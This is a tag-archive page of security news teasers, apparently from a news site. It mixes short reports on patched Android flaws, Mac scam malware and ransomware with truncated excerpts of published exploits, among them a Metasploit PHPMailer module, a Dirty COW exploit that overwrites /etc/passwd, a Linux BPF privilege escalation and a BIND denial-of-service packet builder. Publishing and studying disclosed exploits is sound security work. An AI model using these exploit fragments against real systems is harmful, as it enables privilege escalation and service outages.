Tags archives: vulnerability

 

0

Google Patches Android Custom Boot Mode Vulnerability

A high-risk Android custom boot mode vulnerability was one of many bugs patched by Google as part of its January Android Security Bulletin released earlier this week. On Thursday, the IBM security team that discovered the vulnerability disclosed details about the flaw which leaves Nexus 6 and P6 model handsets open to denial of service [...]

 

0

Malware uses denial-of-service attack in attempt to crash Macs

A tech support scam is targeting Mac users with unusual malware which tries to crash the system then encourages the victim to call a phony Apple support number in order to get the system restored to normal. Victims are infected with the malware via a malicious email or by visiting a specially registered scam website. [...]

 

0

PHPMailer Sendmail Argument Injection

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ##   require 'msf/core'   class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking   include Msf::Exploit::FileDropper include Msf::Exploit::Remote::HttpClient   def initialize(info = {}) super(update_info(info, 'Name' => 'PHPMailer Sendmail Argument Injection', 'Description' => %q{ PHPMailer versions up to and including 5.2.19 are affected by a vulnerability [...]

 

 

0

Linux Kernel Dirty COW PTRACE_POKEDATA Privilege Escalation

// // This exploit uses the pokemon exploit as a base and automatically // generates a new passwd line. The original /etc/passwd is then // backed up to /tmp/passwd.bak and overwritten with the new line. // The user will be prompted for the new password when the binary is run. // After running the exploit [...]

 

0

Linux BPF Local Privilege Escalation

/dev/null; mkdir -p fuse_mount && ./hello ./fuse_mount")) errx(1, "system() failed"); int fuse_fd = open("fuse_mount/hello", O_RDWR); if (fuse_fd == -1) err(1, "unable to open FUSE fd"); if (write(fuse_fd, &iov, sizeof(iov)) != sizeof(iov)) errx(1, "unable to write to FUSE fd"); struct iovec *iov_ = mmap(NULL, sizeof(iov), PROT_READ, MAP_SHARED, fuse_fd, 0); if (iov_ == MAP_FAILED) err(1, "unable to [...]

 

0

BIND 9 DNS Server Denial Of Service

import socket import struct   TARGET = ('192.168.200.10', 53)   Q_A = 1 Q_TSIG = 250 DNS_MESSAGE_HEADERLEN = 12     def build_bind_nuke(question="\x06google\x03com\x00", udpsize=512): query_A = "\x8f\x65\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01" + question + int16(Q_A) + "\x00\x01"   sweet_spot = udpsize - DNS_MESSAGE_HEADERLEN + 1 tsig_rr = build_tsig_rr(sweet_spot)   return query_A + tsig_rr   def int16(n): return struct.pack("!H", n) [...]

 

0

Malicious QuadRooter Apps Discovered in Google Play Store

The recent disclosure of a set of vulnerabilities in the Android operating system that could potentially put over 900 million devices at risk may have been patched, but its threat remains. The QuadRooter flaw, discovered by Check Point, could potentially give cyber attackers complete control over an Android device. The vulnerability was discovered in Qualcomm [...]

 

0

New Pokemon Go Ransomware Creates Windows Backdoor Account

With all the frenzy around the Pokemon GO mobile game, it was only just a matter of time before attackers leveraged its popularity to spread ransomware. A new ransomware was recently discovered impersonating a Pokemon GO application for Windows. Detected by Trend Micro as Ransom_POGOTEAR.A, it appears to be like any other ransomware. However, a [...]

 

0

WordPress Google Maps 2.1.2 Cross Site Scripting

------------------------------------------------------------------------ Cross-Site Scripting vulnerability in Google Maps WordPress Plugin ------------------------------------------------------------------------ Julien Rentrop, July 2016   ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ A Cross-Site Scripting vulnerability was found in the Google Maps WordPress Plugin. This issue allows an attacker to perform a wide variety of actions, such as stealing users' session tokens, or performing arbitrary actions on their behalf. [...]